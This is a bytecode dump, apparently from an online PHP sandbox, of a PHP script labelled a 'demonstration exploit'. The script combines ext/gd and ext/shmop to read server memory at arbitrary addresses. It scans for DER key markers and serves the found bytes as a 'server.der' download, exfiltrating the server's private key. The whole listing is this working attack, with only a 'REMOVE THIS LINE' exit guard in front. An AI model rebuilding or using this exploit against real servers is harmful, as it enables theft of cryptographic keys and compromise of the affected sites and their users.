Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 79) Position 1 = -2 filename: /in/CJptn function name: (null) number of ops: 77 compiled vars: !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 16 0 E > > EXIT 'REMOVE+THIS+LINE' 18 1* INIT_FCALL 'extension_loaded' 2* SEND_VAL 'gd' 3* DO_ICALL $5 4* BOOL_NOT ~6 $5 5* JMPNZ_EX ~6 ~6, ->11 6* INIT_FCALL 'extension_loaded' 7* SEND_VAL 'shmop' 8* DO_ICALL $7 9* BOOL_NOT ~8 $7 10* BOOL ~6 ~8 11* JMPZ ~6, ->13 19 12* EXIT 'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.' 41 13* INIT_FCALL 'init' 14* DO_FCALL 0 43 15* ASSIGN !0, 134578176 45 16* JMP ->68 47 17* INIT_FCALL 'peek' 18* SEND_VAR !0 19* SEND_VAL 1040 20* DO_FCALL 0 $11 21* ASSIGN !1, $11 49 22* INIT_FCALL 'strpos' 23* SEND_VAR !1 24* SEND_VAL '0%82' 25* DO_ICALL $13 26* ASSIGN !2, $13 50 27* TYPE_CHECK 1018 ~15 !2 28* JMPZ_EX ~15 ~15, ->31 29* IS_SMALLER ~16 !2, 1024 30* BOOL ~15 ~16 31* JMPZ ~15, ->67 52 32* INIT_FCALL 'substr' 33* SEND_VAR !1 34* ADD ~17 !2, 4 35* SEND_VAL ~17 36* SEND_VAL 4 37* DO_ICALL $18 38* IS_EQUAL $18, '%02%01%00%02' 39* JMPZ ~19, ->67 53 40* INIT_FCALL 'ord' 41* ADD ~20 !2, 2 42* FETCH_DIM_R ~21 !1, ~20 43* SEND_VAL ~21 44* DO_ICALL $22 45* MUL ~23 $22, 256 46* INIT_FCALL 'ord' 47* ADD ~24 !2, 3 48* FETCH_DIM_R ~25 !1, ~24 49* SEND_VAL ~25 50* DO_ICALL $26 51* ADD ~27 ~23, $26 52* ADD ~28 ~27, 4 53* ASSIGN !3, ~28 54 54* INIT_FCALL 'peek' 55* ADD ~30 !0, !2 56* SEND_VAL ~30 57* SEND_VAR !3 58* DO_FCALL 0 $31 59* ASSIGN !4, $31 56 60* INIT_FCALL 'strpos' 61* SEND_VAR !4 62* SEND_VAL '%01%00%01' 63* DO_ICALL $33 64* IS_SMALLER 0, $33 65* JMPZ ~34, ->67 57 66* JMP ->69 60 67* ASSIGN_OP 1 !0, 1024 45 68* JMPNZ 1, ->17 63 69* INIT_FCALL 'header' 70* SEND_VAL 'Content-type%3A+application%2Foctet-stream' 71* DO_ICALL 64 72* INIT_FCALL 'header' 73* SEND_VAL 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22' 74* DO_ICALL 65 75* ECHO !4 66 76* > RETURN 1 Function init: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/CJptn function name: init number of ops: 19 compiled vars: !0 = $rid line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 24 0 E > BIND_GLOBAL !0, 'rid' 26 1 INIT_FCALL_BY_NAME 'imagecreate' 2 SEND_VAL_EX 10 3 SEND_VAL_EX 10 4 DO_FCALL 0 $1 5 ASSIGN !0, $1 27 6 INIT_FCALL_BY_NAME 'imagecolorallocate' 7 SEND_VAR_EX !0 8 SEND_VAL_EX 0 9 SEND_VAL_EX 0 10 SEND_VAL_EX 0 11 DO_FCALL 0 28 12 INIT_FCALL_BY_NAME 'imagecolorallocate' 13 SEND_VAR_EX !0 14 SEND_VAL_EX 0 15 SEND_VAL_EX 0 16 SEND_VAL_EX 0 17 DO_FCALL 0 29 18 > RETURN null End of function init Function peek: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/CJptn function name: peek number of ops: 31 compiled vars: !0 = $addr, !1 = $size, !2 = $rid line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 31 0 E > RECV !0 1 RECV !1 33 2 BIND_GLOBAL !2, 'rid' 34 3 INIT_FCALL_BY_NAME 'imagecolordeallocate' 4 SEND_VAR_EX !2 5 SEND_VAL_EX 0 6 DO_FCALL 0 35 7 INIT_FCALL_BY_NAME 'imagecolordeallocate' 8 SEND_VAR_EX !2 9 SEND_VAL_EX 1 10 DO_FCALL 0 36 11 INIT_FCALL_BY_NAME 'imagecolorallocate' 12 SEND_VAR_EX !2 13 SEND_VAR_EX !0 14 SEND_VAL_EX 0 15 SEND_VAL_EX 0 16 DO_FCALL 0 37 17 INIT_FCALL_BY_NAME 'imagecolorallocate' 18 SEND_VAR_EX !2 19 SEND_VAR_EX !1 20 SEND_VAL_EX 0 21 SEND_VAL_EX 0 22 DO_FCALL 0 38 23 INIT_FCALL_BY_NAME 'shmop_read' 24 CAST 4 ~7 !2 25 SEND_VAL_EX ~7 26 SEND_VAL_EX 0 27 SEND_VAR_EX !1 28 DO_FCALL 0 $8 29 > RETURN $8 39 30* > RETURN null End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0